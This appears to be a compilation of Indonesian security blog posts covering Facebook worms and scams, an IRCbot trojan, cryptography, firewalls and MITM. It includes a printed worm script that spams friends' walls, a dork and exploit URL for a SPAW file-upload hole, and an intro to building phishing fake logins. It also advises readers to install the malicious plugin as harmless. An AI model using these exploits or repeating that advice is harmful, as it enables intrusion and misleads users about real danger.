PENTING!!!


Rukun Iman terdiri dari enam perkara: (1) Iman kepada Allah. (2) Iman kepada malaikat-malaikat Allah. (3) Iman kepada kitab-kitab Allah. (4) Iman kepada rasul-rasul Allah. (5) Iman kepada hari kiamat. (6) Iman kepada Qada dan Qadar.

Rukun Islam terdiri dari lima perkara: (1) Mengucap dua kalimat syahadat. (2) Menunaikan shalat lima waktu. (3) Mengeluarkan zakat. (4) Berpuasa pada bulan Ramadan. (5) Menunaikan Haji bagi mereka yang mampu.

Menelusuri Penyebaran Link Video Nakal Pada Wall Facebook

Tidak jauh beda dari posting sebelumnya, kali ini saya akan membahas tentang penyebaran link nakal melalui wall pada Facebook.

Hal ini bermula saat beberapa jam yang lalu salah satu teman saya mengirim sebuah link "video" yang menurut saya cukup menarik..


Bagaimana? menarik bukan? :D

Setelah saya "jalan-jalan" ternyata bukan cuma saya yang mendapat kiriman link tersebut. Beberapa teman saya juga terkena imbasnya, tapi tenyata teman-teman saya sudah pada canggih.

Canggih koq masih ada yang kena?!

Hmm.. saya rasa itu karena dia (korban) terlalu mengedepankan nalurinya sebagai lelaki. Haha :D coba lihat..


Jika sebagian dari anda sudah tahu akan hal ini dan sebisa mungkin mencoba menghindarinya. Saya justru "gatel", penasaran.. "bisa apa sih?". Untuk itu, langsung saja kita telusuri lebih dalam isi link tersebut.

Saya mulai dengan membuka link yang diberikan : http://fbviralvideos.blogspot.com


Wow, sangat mirip dengan halaman video di facebook. Tapi saya rasa ini cuma cloning.

Fokus Pada Area Video

Di situ dijelaskan bahwa saya anda tidak dapat memutar video tersebut karena keterbatasan plugin Divx, dimana plugin tersebut merupakan premium plugin dari Youtube. Saya Anda diminta menginstalnya terlebih dahulu sebelum dapat menyaksikannya.

Setelah saya cari tahu, ternyata isi dari area tersebut diambil dari http://pluginplugin.blogspot.com yang disuntikan kedalam area video.


Sampai disini tidak akan terjadi apa2, kecuali anda meng-klik "Install Plugin". Apa yang akan terjadi?

Saat "Install Plugin" di-klik, browser akan bertanya apakah anda mengizinkan plugin tersebut "berkiprah" pada browser anda? Jika anda memberikan allow, maka plugin tersebut akan langsung ter-install setelah tombol "Install Now" anda tekan.

Sampai disini juga belum terjadi apa-apa.

Lho! Trus kapan?

Hoo.. sabar.. :)

Link nakal tersebut baru akan menyebar setelah anda me-restart browser anda.



Maaf, demi kenyamanan teman-teman facebook saya, pada contoh kasus ini saya login menggunakan account rahasia :p

Apa yang terjadi?

Dibawah ini hanya merupakan potongan script yang berkontribusi dalam penampilan link tersebut, sengaja tidak saya tampilkan semua karena akan menyalahi kode etik dunia persilatan :p

...
var randomnumber=Math.floor(Math.random()*10001) var video_url='http://fbviralvideos.blogspot.com/#'+ randomnumber +''; var domains=['http://i.imgur.com/piRgr.png']; var p0=['Check this','Its funny...','You will like..']; var p1=['hey','Hey','Ey!','Wazzup','Hello!','Look!','Great','Incredible!']; var p2=['this is really hot!','Look now!','hahaha!']; var p3=['HOT Girl Shows Her Breast on Live TV']; var message='';var a;gf=new XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer='+uid+'&'+Math['random'](),false);gf['send']();if(gf['readyState']!=4){}else{data=eval('('+gf['responseText']['substr'](9)+')');if(data['error']){return false;}else{a=data;}} var b=a['payload']['entries']['length'];if(b>30){b=30};var cook=readCookie("fb_video_"+user_id);if(cook=="activo") return false;message=[randomValue(p1),randomValue(p2),randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var d='http://www.facebook.com/ajax/profile/composer.php?__a=1'; var title='HOT Girl Shows Her Breast on Live TV!!!'; var summary='HOT Girl Shows Her Breast on Live TV'; var imagen='http://i.imgur.com/piRgr.png';
...

Solusi

Apa bila anda sudah terkena (teman-teman saya bilang) "virus" itu, silahkan uninstall plugin Youtube extension yang ada pada browser anda. Pada Mozilla Firefox itu dapat dilakukan dengan masuk pada menu Tools >> Add-Ons lalu pada tab Extension cari Youtube extension lalu klik Uninstall dan restart browser anda.

Kesimpulan

Pada contoh kasus kali ini, silahkan anda klik link tersebut, silahkan anda install plugin yang direkomendasikan, tidak usah takut toh tidak akan terjadi apa-apa selama browser anda tidak di-restart :D

Menelusuri Spam Chat Pada Facebook

Pagi ini saya mendapat hadiah dari salah seorang teman saya melalui akun jejaring sosial. Walaupun sebagian besar orang menganggpnya musibah, tapi ini merupakan berkah tersendiri bagi saya karena memang akhir-akhir ini saya babar blas tidak memiliki ide untuk posting. Mau tahu apa isi hadiahnya? Ayo kita buka bersama-sama. :)

Ini bungkusnya :



Ketika saya coba buka url yang diberikan (http://bit.ly/t365PB) pada browser, url tersebut mengarah ke sebuah halaman yang tentunya tidak asing bagi kita :



Wah.. baru tahap pertama sudah sangat menarik. Ternyata url tersebut mengarah ke Rapidshare. Eh, tunggu-tunggu! Koq urlnya http://www.thepondworld.com/users/dn.htm?id8h7r-Picture25.JPG. Sejak kapan Rapidshare ganti domain? :D

Ada satu lagi yang aneh, coba lihat ke taskbar saya! kotak dialog download IDM langsung keluar tanpa diminta menunggu sekian detik. Kayanya saya belum pernah beli premium account :p

Lanjutt..

Pada saat file tersebut selesai didownload, berukuran 121,20 kb, dengan nama "Picture25.JPG.zip"




File yang sama juga saya dapatkan setelah mengakses url lainya yang diberikan.

Setelah saya extract, terdapat sebuah file bernama "Picture25.JPG_www.facebook.com" dengan tipe MS-DOS Application sebesar 133 kb.

Disitu terlihat bahwa file tersebut bereksistensi .com yang merupakan eksistensi dari bahasa pemrograman tingkat dewa yaitu assembly :D tapi setahu saya eksistensi .com hanya berukuran maksimal 64 kb, sedangkan file tersebut berukuran 133 kb.

Hmm.. untuk memastikan, saya coba membuka file tersebut menggunakan notepad. Ternyata berawalan "MZ". 

Saya tidak punya presepsi lain lagi (karena memang hanya sebatas itu pengetahuan saya. hehe..) selain meyakini bahwa file tersebut benar-benar dibuat menggunakan bahasa assembly dan bereksistensi .com tapi kenapa ukurannya bisa lebih dari 64 kb? Entahlah, waktu kuliah teknik digital walaupun duduk paling depan tapi saya jarang memperhatikan, sedangkan di lab mikroprosessor saya cuma maen Spider Solitaire. :D

Setelah saya mematikan koneksi internet, langsung saja saya buka file "Picture25.JPG_www.facebook.com". Oleh windows defender, file tersebut terdeteksi sebagai Backdoor:win32/IRCbot.gen!k yang tidak lain dan tidak bukan merupakan trojan backdoor yang masuk dalam keluarga besar IRC-controlled backdoor trojans.

Ketika dieksekusi, malware tersebut akan meng-copy-kan diri ke direktori "%windir%" atau satu dari subdirektorinya seperti "<system folder>" atau "%windir%\system", itu berarti dia akan aktif saat sistem startup.

Sehebat Apa Backdoor:Win32/IRCbot.gen!K?

Setelah terinstal, Backdoor:Win32/IRCbot.gen!K akan menghubungkan dirinya ke server IRC menggunakan port tertentu.

Kemudian tinggal menunggu perintah dari pemegang remote (attacker). Perintah-perintah tersebut tidak terbatas, pada umumnya seperti:
  • Download dan menjalankan file
  • Melakukan update
  • Mengumpulkan informasi sistem
  • Menjalankan berbagai server pada sistem
  • Mengirim email ataupun instant messages
  • Merpartisipasi (membuat komputer kita menjadi zombie) dalam serangan DDoS
Nah, sekarang anda sudah bisa membayangkan kan apa yang mungkin terjadi bila anda sedikit saja ceroboh?

Sampai disini saja, sengaja saya tidak melanjutkan menelusuri sumber biang kerok, karena selain ilmu saya masih terlalu cetek, itu akan melanggar kode etik dunia persilatan! :p

Memahami Tujuan Security Dan Kemungkinan Serangan Yang Dapat Terjadi

Pada dasarnya tujuan security adalah confidentiality, integrity, dan availability.

Confidentiality

Confidentiality adalah aspek utama pada aspek keamanan informasi. Kita perlu melindungi informasi yang kita miliki dari tindakan-tindakan yang dapat membahayakan kerahasiaannya.

Di dalam militer, informasi adalah hal yang sangat sensitif. Pada industri, menyembunyikan informasi dari para pesaing juga merupakan hal yang sangat krusial. Hal yang sama juga terjadi dalam dunia perbankan, data pelanggan harus tetap dijaga kerahasiaannya.

Integrity

Informasi perlu diubah secara teratur. Misal saja di bank, ketika pelanggan menyimpan atau mengambil uang, saldo di dalam account-nya juga harus berubah. Integrity yang dimaksud adalah perubahan yang terjadi hanya dapat dilakukan oleh seseorang yang berhak melakukannya (authorized entities) dan juga oleh mekanisme yang sah (authorized mechanisms).

Availability

Kompomen ketiga dari keamanan informasi adalah Availability, Informasi diciptakan dan disimpan dalam tempat yang memungkinkan bagi pengguna yang sah (authorized entities) untuk mengaksesnya. Informasi menjadi tidak berguna jika tidak informasi itu sendiri tidak tersedia.

Bayangkan apa yang akan terjadi pada bank jika pelanggan tidak dapat mengakses account mereka untuk melakukan transaksi.

Ketiga tujuan security diatas--confidentiality, integrity, dan availability--rentan oleh serangan (security attacks). Berikut ini serangan-serangan yang dapat terjadi berdasarkan tujuan security.

-------------------- | Security Attacks | -------------------- | |-----------------------------|-----------------------------| | | | -------------------- -------------------- --------------------- | Snooping | | Modification | | Denial of Service | -------------------- -------------------- --------------------- | | | -------------------- -------------------- Serangan Terhadap | Traffic Analysis | | Masquerading | Availability -------------------- -------------------- | | Serangan Terhadap -------------------- Confidentiality | Replaying | -------------------- | -------------------- | Repudiation | -------------------- | Serangan Terhadap Integrity

Kriptografi Asimetris

Kriptografi Asimetris
Pada posting sebelumnya sudah saya jelaskan dengan (sangat) singkat apa itu kriptografi simetris, kelebihan, serta kekurangannya.

Sedikit mengulang kembali, pada kriptografi simetris hanya menggunakan 1 buah kunci pada saat enkripsi maupun dekripsi. Hal itu tentu saja menimbulkan masalah pada saat melakukan pertukaran kunci seperti pada kasus Alice yang ingin mengirim pesan rahasia kepada Bob. Bagaimana cara mereka menegosiasikan kunci yang akan digunakan? apakah melalui sms, email atau telepon? bukankah itu semua bisa disadap?

Apa itu Kriptografi Asimetris?

Kriptografi Asimentris atau disebut juga Public Key Criptography (PKC), adalah kriptografi yang menggunakan 2 buah kunci (private & publik) yang masing-masing kunci tersebut hanya digunakan untuk enkripsi saja atau dekripsi saja.

Kunci public adalah kunci yang publikasikan/diberikan kepada orang lain, sedangkan kunci private harus dirahasiakan.

Apabila pesan di-enkripsi menggunakan kunci publik, maka dekripsi-nya menggunakan kunci private. Artinya, pesan hanya bisa dibuka oleh pemilik kunci private. Hal ini biasanya digunakan untuk tujuan confidentalily (kerahasiaan).

Sebaliknya, apabila pesan dienkripsi menggunakan kunci private, maka dekripsi-nya menggunakan kunci publik. Disini sudah jelas, berarti semua orang bisa membukanya. Ini biasa digunakan untuk melakukan authentication.

Alice dan Bob

Jika sebelumnya Alice dan Bob kesulitan dalam melakukan pertukaran kunci karena mereka menggunakan kriptigrafi simetris, coba lihat apabila mereka menggunakan kriptografi asimetris.

Saat Alice ingin mengirim pesan rahasia kepada Bob, mereka masing-masing harus sudah mempunyai kunci publik & private. Bila Alice ingin mengirim pesan kepada Bob, maka Alice mengenkripsi pesanya dengan kunci publik milik Bob (ingat, kunci publik boleh dimiliki oleh siapa saja), kemudian Bob mendekripsi pesan dari Alice menggunakan kunci private miliknya.

Terkesan lebih aman bukan? tapi tunggu, masih ada hal buruk yang dapat terjadi pada kriptografi asimetris.

Rawan Serangan MITM

Disini saya tidak akan menjelaskan tentang MITM, karena itu sudah pernah saya tulis pada posting sebelumnya.

Kronologi

Sebelum Alice mengirim pesan rahasia kepada Bob, Alice meminta kunci publik milik Bob. Kemudian Bob mengirim kunci publik-nya kepada Alice.

Sebelum kunci publik itu sampai di Alice, tanpa sepengetahuan Alice dan Bob, kunci publik milik Bob DICATAT oleh Charlie dan DIGANTI dengan kunci publik milik Charlie sendiri, lalu dikirimkan lagi (diteruskan) ke Alice.

Alice tertipu, mengira bahwa kunci publik yang diterimanya adalah kunci publik milik Bob, padahal itu milik Charlie.

Setelah selesai menuliskan pesan rahasianya, kemudian Alice meng-enkripsi pesannya menggunakan kunci pulic milik Charlie (bukan milik Bob) dan mengirimkannya ke Bob.

Sebelum sampai di Bob, pesan dari Alice di-dekripsi oleh Charlie menggunakan kunci private miliknya (karena pesan tersebut dienkripsi menggunakan kunci publik milik Charlie).

Agar Bob tidak curiga, pesan yang sudah di-dekripsi itu di-enkripsi kembali menggunakan kunci publik milik Bob yang sebelumnya sudah dicatat oleh Charlie, kemudian dikirimkan lagi ke Bob.

Bob men-dekripsi pesan itu dengan kunci private miliknya, dan pesan itu dibaca oleh Bob seperti tidak terjadi apa-apa.

Pada kasus diatas, MITM terjadi karena Alice tidak bisa memastikan apakah pesan berisi kunci publik yang diterimanya adalah benar milik Bob. Untuk bisa memastikan pesan itu berisi kunci publik milik Bob, maka pesan itu harus di-enkripsi menggunakan kunci private milik Bob dan di-dekripsi oleh Alice menggunakan kunci publik milik Bob, padahal Alice belum mengetahui kunci publik milik Bob.

Bagaimana solusinya? 

Agar serangan MITM tidak terjadi dibutuhkan mekanisme untuk mendapatkan kunci publik dengan benar.

Untuk memecahkan masalah diatas, dibutuhkan bantuan pihak ke-3 sebagai pihak penjamin yang kunci publik-nya telah diketahui sebelumnya.

Mari kita ilustrasikan pengembangan dari kasus MITM sebelumnya yang dilakukan oleh Charlie. Anggap saja pihak penjamin itu adalah Dedy, dengan kunci publik yang telah dikenal sebelumnya oleh Alice.

Ketika Alice ingin mengetahui kunci publik Bob, maka Bob sebelumnya harus meminta Dedy untuk membuat surat jaminan yang berisi kunci publik Bob dan pernyataan bahwa Bob adalah orang baik dan rajin menabung. :D

Kemudian surat itu di-enkripsi dengan kunci private milik Dedy untuk memastikan bahwa surat itu benar dibuat oleh Dedy.

Bila Alice bertanya pada Bob, “Hey Bob tolong kirim kunci publik mu, aku ada pesan rahasia untukmu”. Maka Bob akan mengirimkan surat jaminan dari Dedy pada Alice.

Ketika surat jaminan yang dikirim Bob tiba di Alice. Alice bisa menguji identitas pembuat surat itu dengan cara men-dekripsi dengan kunci publik milik Dedy yang sudah dikenalnya.

Bila berhasil di-dekripsi, maka surat jaminan itu benar dibuat oleh Dedy. Di dalam surat jaminan itu tertera juga kunci publik milik Bob. Kini Alice siap mengirim pesan rahasia pada Bob.

Bagaimana dengan Charlie? Bila Charlie nekat mengganti surat jaminan Dedy dengan surat jaminan yang dibuatnya sendiri lalu mengirimnya ke Alice. Maka Alice dengan mudah mengetahui bahwa surat ini palsu, karena tidak bisa di-dekripsi dengan kunci publik Dedy, artinya surat jaminan ini bukan dibuat oleh Dedy.

Kesimpulan
  • Kriptografi asimetris dilakukan menggunakan 2 buah kunci; kunci publik dan kunci private.
  • Kunci publik adalah kunci yang publikasikan/diberikan kepada orang lain.
  • Kunci private harus dirahasiakan.

Kelebihan Kriptografi Asimetris:

Kelemahan Kriptografi Asimetris:
  • Proses lama
  • Rawan serangan MITM

Kriptografi Simetris

Kriptografi Simetris
"Tidak sistem yang 100% aman". Kutipan itulah sering kali saya jumpai di berbagai situs, forum, dan bahkan teman dan dosen saya sering mengucapkan kalimat tersebut. Walaupun sebuah sistem telah dilindungi menggunakan hardware tercanggih, software terpintar, firewall, antivirus, IDS/IPS, dan lain sebagainya--tapi jika manusia yang mengoperasikanya lalai, maka semua piranti itu tidak akan berarti.

Kriptografi merupakan ilmu dan seni untuk menjaga keamanan sebuah pesan dengan cara mengubah plaintext ke dalam chipertext.


      --------[Enkripsi]--------
      |                        |
      |                        |
-------------              --------------              -------------
| Plaintext | ---[key]---> | Chipertext | ---[key]---> | Plaintext |
-------------              --------------              -------------
                                    |                        |
                                    |                        |
                                    --------[Dekripsi]-------- 
 
 
Apa itu Kriptografi Simetris?

Kriptografi simetris adalah kriptografi yang hanya menggunakan 1 kunci (key) pada saat enkripsi maupun dekripsi.

Contoh: Saat Alice ingin mengirim pesan rahasia kepada Bob, pesan tersebut di-ekripsi oleh Alice menggunakan kunci "GMT" menjadi sebuah chipertext dan kemudian dikirimkan ke Bob. Agar pesan dalam chipertext itu dapat dibaca, Bob harus men-dekripsi chipertext tersebut menggunakan kunci yang sama yang digunakan oleh Alice ketika meng-enkripsi pesan tersebut, yaitu kunci "GMT".

Pada kasus diatas berarti sebelum Alice dan Bob dapat bertukar pesan rahasia, SEBELUMNYA mereka HARUS SUDAH menyepakati sebuah kunci yang akan digunakan. Lalu bagaimana cara mereka menegosiasikannya? apakah melalui sms, email atau telepon? bukankah itu semua bisa disadap?

Sekian posting kali ini, pada posting selanjutnya saya akan sedikit bercerita tentang kriptografi asimetris yang notabene dianggap lebih baik dari pada kriptografi simetris.

Kesimpulan:
  • Kriptografi simetris dilakukan menggunakan 1 kunci.
Kelebihan kriptografi simetris:
  • Proses cepat.
Kekurangan kriptografi simetris:
  • Sulit dalam pertukaran kunci.

Pengantar Keamanan Komputer

Mengapa Fokus Pada Keamanan?

Saat ini sudah menjadi hal yang biasa ketika seseorang terhubung dalam social network, email, online shopping dan mengakses informasi sensitif lainya menggunakan internet. Informasi sensitif tersebut pada umumnya berisi:
  • Informasi pengetahuan
  • Informasi kartu kredit dan  perbankan
  • Informasi pribadi yang bersifat rahasia
  • Informasi rahasia perusahaan
Jika informasi tersebut jatuh ke tangan orang yang salah, ada kemungkinan dia akan menyalahgunakan informasi tersebut untuk keuntungan pribadi. Pada saat orang tersebut menyalahgunakan informasi sensitif yang didapatnya, kemungkinan besar dia akan menggunakan identitas yang berbeda (indentitas palsu) baik pada sistem online maupun offline. Sistem ini dapat mencakup:
  • Online banking
  • Layanan email
  • Social network
  • Online shopping
  • Sistem operasi
  • Program aplikasi
Sistem dan Keamanannya

Facebook Masih Melacak Cookie Bahkan Setelah Anda Logout!



Menurut Australian technologist Nik Cubrilovic: "Logging out of Facebook is not enough". Dia menambahkan, bahkan setelah anda logout, Facebook mampu melacak halaman browser anda setiap kali anda mengunjungi sebuah website. Dia menuliskan dalam blog-nya: "With my browser logged out of Facebook, whenever I visit any page with a Facebook like button, or share button, or any other widget, the information, including my account ID, is still being sent to Facebook".

Setelah menjelaskan perilaku cookie tersebut, ia juga mengusulkan cara untuk memperbaiki masalah tracking tersebut: "The only solution to Facebook not knowing who you are is to delete all Facebook cookies".

Source: news.enigmagroup.org

Memahami Firewall II

Pada posting sebelumnya yang berjudul Memahami Firewall I saya telah menuliskan apa itu firewall dan beberapa jenis firewall. Kali ini saya akan sedikit membahas tentang cara kerja firewall.

Bagaimana Firewall Bekerja?

Firewall bekerja dengan cara menutup traffic yang datang ( incoming network traffic) berdasarkan sumber atau tujuan dari traffic tersebut.

Semua network traffic memiliki sumber/source, tujuan/destination, dan protokol/protocol. Protokol disini biasanya berupa TCP, UDP, atau ICMP.

Jika protokol ini adalah TCP atau UDP, maka terdapat source port dan destination port. Kebanyakan source port dan destination port yang digunakan adalah nomer port yang terkenal. Sebagai contoh, source port untuk HTTP adalah 80 dan destination port untuk DNS adalah 53.

Lain halnya dengan protokol ICMP dimana terdapat jenis pesan ICMP. Jenis yang paling umum yang ada pada ICMP adalah Echo Request dan Echo Reply.

Memahami Firewall I

Apa itu Firewall?

Firewall adalah sistem yang dibentuk untuk mengontrol arus lalu lintas data antara 2 jaringan. Sebelumnya, firewall paling sering dikonfigurasi secara khusus pada sistem UNIX, tetapi sekarang firewall juga telah dibangun pada sistem-sistem lain, termasuk sistem yang dirancang khusus untuk digunakan sebagai firewall.

Packet Filtering

Salah satu jenis firewall adalah packet filtering. Dalam packet filtering, firewall bekerja dengan cara memeriksa karakteristik pada suatu paket yang melaluinya:
  • Port sumber
  • IP address tujuan
  • Port tujuan
  • IP protocol (TCP/UDP)

Microsoft Meremehkan Cookiejacking Vulnerability pada IE

Microsoft sudah tidak mempertimbangkan kehadiran bug pada Internet Explorer yang memungkinkan terjadinya serangan hijacking, tapi para peneliti keamanannya berpikir lain dengan melihat pengalaman yang sudah-sudah mendukung pendapat mereka.

Minggu lalu pada Hack in the Box security conference di Amsterdam, peneliti keamanan dari Italia, Rosario Valotta men-demo-kan serangan yang memanfaatkan zero-day vulnerability pada semua versi Internet Explorer untuk pencurian session cookies.

Session cookies adalah file teks berukuran kecil yang digunakan oleh website untuk melacak authentication user/pengguna. Dengan memiliki akses terhadap session cookie, attacker dapat mengendalikan (memiliki akses) account korban.

Oleh Valotta, serangan ini diberi nama cookiejacking karena menggabungkan bug pada IE dengan teknik clickjacking.

Pada dasarnya, itu adalah serangan social engineering yang mengelabui korbannya untuk berinteraksi dengan elemen halaman yang dibuat khusus oleh attacker.

SPAW Upload Vulnerability

Dork:

inurl:spaw2/uploads/files/

Exploit:
http://website_target/..../spaw2/uploads/files

Ubah menjadi:
http://website_target/..../spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Setelah itu akan keluar halaman upload, silahkan eksplorasi sendiri :)

Bug pada IE Memungkinkan Serangan Session Cookie Hijacking

Sebuah zero-day vulnerability mempengaruhi setiap versi Internet Explorer yang memungkinkan attacker mengeksekusi serangan seperti clickjacking dalam rangka untuk mencuri session cookies.
Serangan yang dijjuluki cookiejacking ini, diungkapkan oleh peneliti keamanan independen Rosario Valotta pada Hack in the Box 2011 security conference di Amsterdam.

Serangan tersebut tidak berjalan sendiri namun dikombinasikan dengan beberapa teknik-termasuk sedikit social engineering. Bagaimanapun juga, jika dilakuukan dengan benar-hal tersebut terbukti sangat efektif.

Bug pada IE tersebut-terdapat pada browser loading sebuah konten cookie yang jika file yang berkaitan ditampilkan sebagai src untuk iFrame.

Namun sejak penggunaan path cookie tergantung pada user Windows, attacker perlu menentukan nilainya. Valotta menjelaskan metode web yang berbasis vulnerability ini terhadap browser dapat menampilkan username korban.

Menelusuri Scam pada Facebook

Sebelumnya hal ini jarang sekali terjadi, tapi hari ini seseorang (sebut saja Bunga) mengirim sesuatu di wall Facebook saya:

"OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour. click below"

Tentu saja saya tau kalo itu scam karena formatnya, bahasa yang digunakan, dan kenyataan bahwa dia (orang yang mengirim) tidak punya EX (baca: mantan) - kaya saya. =)) Setelah itu saya langsung copy pesan dan link-nya, hapus, lalu log off dan mulai mencari "kebenaran". :)

Link tersebut membawa saya ke situs: Welcome to Facebook - Log In, Sign Up or Learn More

Disitu seperti kebanyakan scam, mereka menginginkan agar anda menyalin javascript kedalam browser anda (jangan pernah dilakukan), jadi saya pustuskan untuk melihatnya lebih dalam.

Dilihat dari source-nya, tampaknya source tersebut berasal dari file http://wantnights.info/high.js. Setelah melihat yang saya temukan, itu adalah sebuah cookie grabber sederhana yang akan merekam login anda. Kemudian dia akan mendapatkan daftar teman anda lalu membuat pesan yang sama pada wall mereka.

Kemudian akan mengirim anda ke http://careget.info/next.php?userid = "+ user_id +" & name = "+ user_name dimana nampaknya merupakan informasi log anda ke halaman sebelum anda di redirect ke situs scam tersebut.

Melihat source pada next.php yang ada di http://careget.info/next.php, dapat dilihat bahwa kemudian itu akan mengarah ke http://bazerem.info/lb.php

Inovasi Anak Bangsa Peduli Teknologi

Disebutkan bahwa Indonesia merupakan konsumen hardware tertinggi di dunia, hal itu tidak lagi mengejutkan bila melihat realita yang terjadi saat ini.

Sebagai contoh, tidak usah ke ibu kota, di Jogja saja hampir setiap bulan diadakan pameran teknologi dimana disitu terdapat produk-produk terbaru yang belum lama di-launching dan ada di pameran tersebut. Bagi sebagian orang, itu terkesan membanggakan, karena tidak perlu menunggu terlalu lama, produk itu sudah masuk di Indonesia. Saat produk baru masuk, masyarakat kita berbondong-bondong menggunakannya, mengganti produk "lama" yang sebelumya mereka gunakan. Begitulah selanjutnya-fenomena yang terjadi saat masyarakat disuguhi produk-produk baru, tentu saja produk ber-merk luar.

Contoh lagi, BlackBerry di kalangan remaja. Banyak anak SMP, SMA, kuliah yang menggunakan BlackBerry, it's ok, tapi ternyata, kebanyakan dari mereka hanya menggunakanya tidak lebih dari handphone GPRS biasa, hanya digunakan untuk sms, telepon, chating, Facebook-an dan hal-hal lainya yang sebenarnya bisa juga dilakukan oleh gadget lamanya. Sedangkan untuk optimalisasi fasilitas yang tersedia-tidak begitu menonjol, hanya sebagian kecil pengguna yang memanfaatkanya. Entah gengsi atau takut dibilang ketinggalan jaman atau mungkin biar dibilang anak G4UL, tapi itulah yang terjadi saat ini.

[Step By Step] Membuat Fake Login

Hi, apa kabar? Akhirnya, setelah vakum selama kurang lebih 3 minggu saya bisa nulis lagi disini. Kemarin-kemarin saya (sok) sibuk fokus ke UTS, mudah-mudahan hasilnya memuaskan. Amin :)

Jika anda pembaca setia blog ini tentunya anda sudah tahu tentang phishing yang saya tulis pada Hacking Facebook Account dan Hacking Facebook Account II yang didalamya terdapat beberapa contoh fake login untuk mencuri data yang diinputkan user. Nah, disini saya masih akan membahas tentang phishing menggunakan fake login, tapi tidak seperti sebelumnya: saya menyediakan fake login siap pakai, kali ini saya akan menunjukan bagaimana cara membuat fake login.

Membuat fake login tidak sesulit kelihatanya, bahkan sangat mudah. Tapi, menurut saya seni dalam fake login adalah bagaimana cara attacker membuat korban masuk dan tenggelam dalam perangkap yang sudah disediakan tanpa pernah curiga.

Baiklah, yang perlu anda siapkan adalah:
  • Halaman fake login
  • Script PHP
  • File *.txt kosong

Hacking Facebook Account II

Ini merupakan kelanjutan dari artikel saya sebelumnya yang membahas tentang pencurian email dan password Facebook serta bagaimana cara kerjanya. Sebelumya telah kita kelompokan jenis-jenis serangan yang marak digunakan attacker untuk mendapatkan account facebook korban:
  • Sniffing
  • Phisihng
  • Scam
  • Keylogger
  • Social engineering
Kemarin saya sudah membahas beberapa diantaranya seperti sniffing dan phishing, kali ini saya akan fokus membahas Scam.

Apa itu scam? Scam adalah informasi yang ada diinternet yang bersifat menipu.

Bagaimana scam digunakan dalam pencurian account facebook?

Saya gambarkan dengan contoh kisah Intan dengan Tarwad dibawah ini.

Hacking Facebook Account

Sebenarnya dari dulu saya kurang tertarik mengangkat topik ini karena:
  • Umum: coba anda perhatikan saat mengunjungi forum, situs maupun blog kemungkinan besar disitu terdapat "Hacking Facebook"
  • Kurang bermanfaat: apa gunannya mengambil account Facebook orang lain? teman? pacar? Toh semua tentang mereka bisa kita lihat lewat account kita, kecuali hal-hal yang bersifat pribadi. Hormatilah privasi orang lain.
  • Ga keren: apa yang akan anda lakukan saat sudah mengambil alih facebook orang teman? mencuri chip poker? mengganti foto profilnya dengan gambar porno? update status menggunakan kata-kata kotor? FU@K THEM!
Mungkin cukup itu alasan saya. Tentunya sekarang anda bertanya "kenapa ditulis?". Selain sedang miskin ide, alasan saya menulis ini adalah untuk sharing agar anda tidak terjebak didalamnya, pencurian account Facebook.

Memahami Digital Signature/Tanda Tangan Digital

Masalah Authentication dan Integrity

Suatu saat, seorang teman menunjukan kepada anda sebuah file, kemudian dia mengklaim bahwa itu dibuat oleh Si X pada bulan lalu. Apa reaksi anda? Tentunya ada beragam pertanyaan yang akan muncul:
  • Apa benar file itu dibuat 1 bulan yang lalu?
  • Apa benar file itu dibuat oleh Si X?
  • Apa benar isi file yang dilihat sekarang adalah yang ditulis Si X bulan lalu? Mungkin saja isinya sudah diubah sehingga berbeda dengan yang ditulis Si X bulan lalu.
Pertanyaan-pertanyaan itu lah yang menjadi vulnerability yang bisa saja di-exploit oleh seseorang. Dengan kata lain, vulnerability yang dimaksud adalah:
  • Authentication: Siapa sebenarnya pembuat dokumen
  • Integrity: Apakah dokumen itu masih asli (sama seperti pertama kali dibuat) atau sudah diubah.

Memahami Man in The Middle (MITM)

Man in the middle (mitm attack) merupakan salah satu jenis serangan yang berbahaya karena serangan ini dapat terjadi pada berbagai media informasi seperti website, handphone, dan bahkan surat. Oleh karena itu, artikel ini akan membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasinya.

Lebih Dari Sniffing

Mungkin banyak yang mengira bahwa tujuan dari dari mitm attack adalah  untuk menyadap komunikasi data rahasia, seperti sniffing. Pada dasarnya sniffing bisa disebut sebagai passive attack, karena saat sniffing attacker tidak melakukan apa-apa melainkan memantau lalu-lintas data yang lewat.

Lebih dari sniffing, pada mitm attacker dapat memantau, mencegat, bahkan mengubah data/informasi dalam komunikasi itu sehingga mitm attack dapat dikatakan sebagai active attack.

Berikut ini adalah gambaran skenario yang dapat dilakukan attacker saat melakukan mitm.

Mencuri Account Facebook Lebih Mudah Jika Dilakukan Dengan Gotong Royong

Seperti yang anda tahu, Facebook merupakan social networking yang paling "padat penduduk". Selain fasilitas, tentunya hal ini juga didukung dengan sistem keamanan yang secure. Tidak hanya menggunakan authentication berbasis password, Facebook juga menggunakan security question, nomor handphone, email secunder dan bahkan teman anda di Facebook-pun digunakan sebagai salah satu bentuk authentication.

Karena penasaran, iseng-iseng saya coba melakukan pencurian terhadap account Facebook milik saya sendiri menggunakan fasilitas yang disediakan oleh Facebook yaitu Forget Password. Berikut ini hasilnya:

Memahami Social Engineering IV

Berbeda dengan teknik hacking pada umumnya yang membutuhkan pengetahuan tentang bahasa-bahasa pemrograman tertentu, social engineering merupakan teknik hacking yang menggunakan interaksi langsung dengan manusia, memanfaatkan kelemahanya untuk mendapatkan sebanyak-banyaknya informasi penting tanpa dia, si calon korban sadari. Karenanya teknik dalam melakukan social engineering sangatlah variatif. Beberapa contohnya adalah sebagai berikut:


  • ketika seseorang memasukkan password di ATM atau di PC, yang bersangkutan “mengintip” dari belakang bahu sang korban, sehingga karakter passwordnya dapat terlihat,
  • mengaduk-ngaduk tong sampah tempat pembuangan kertas atau dokumen kerja perusahaan untuk mendapatkan sejumlah informasi penting atau rahasia lainnya,
  • menyamar menjadi “office boy” untuk dapat masuk bekerja ke dalam kantor manajemen atau pimpinan puncak perusahaan guna mencari informasi rahasia,
  • ikut masuk ke dalam ruangan melalui pintu keamanan dengan cara “menguntit” individu atau mereka yang memiliki akses legal,

Memahami Social Engineering III

